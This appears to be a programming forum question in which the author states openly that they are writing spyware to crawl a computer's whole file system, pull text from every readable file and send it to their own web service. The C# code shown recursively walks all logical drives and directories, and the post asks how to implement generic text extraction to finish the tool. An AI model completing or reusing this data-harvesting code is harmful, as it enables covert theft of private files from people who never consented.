I'm creating a spyware program that craws the entire file system of a computer and looks for any text that it can find and sends it to my accompanying web service. The problem I'm having is, once I have a file, it is either a type of file from which I can extract text (i.e. if it's a .txt., .docx, .xml, etc. file) or it's not. If it is, I want to extract the text from it. What I have right now is
private string _accumulatedInfo;
public FileCrawler ( )
{
this._accumulatedInfo = String.Empty;
}
private void GrabInfo ( System.IO.FileInfo fi )
{
// if can parse text out of file, add text to accumulated info string
// ...
}
private void _WalkDirectoryTree ( System.IO.DirectoryInfo root )
{
System.IO.FileInfo[] files = root.GetFiles("*.*");
if ( files != null )
{
foreach ( System.IO.FileInfo fi in files )
{
GrabInfo(fi);
}
}
System.IO.DirectoryInfo[] subDirs = root.GetDirectories();
if ( subDirs != null )
{
foreach ( System.IO.DirectoryInfo dirInfo in subDirs )
{
this._WalkDirectoryTree(dirInfo);
}
}
}
private void CrawlAllDrives ( )
{
string[] drives = System.Environment.GetLogicalDrives();
foreach ( string dr in drives )
{
System.IO.DriveInfo di = new System.IO.DriveInfo(dr);
if ( di.IsReady )
{
System.IO.DirectoryInfo rootDir = di.RootDirectory;
this._WalkDirectoryTree(rootDir);
}
}
}
and I'm wondering how to, or whether it's even possible to, implement my
private void GrabInfo ( System.IO.FileInfo fi )
{
// if can parse text out of file, add text to accumulated info string
// ...
}
method without resorting to something like
private void GrabInfo ( System.IO.FileInfo fi )
{
switch (fi.Extension)
{
case "txt":
// ...
case "docx":
// ...
// ...
}
}
Does there exist some generic way of extracting text from a file?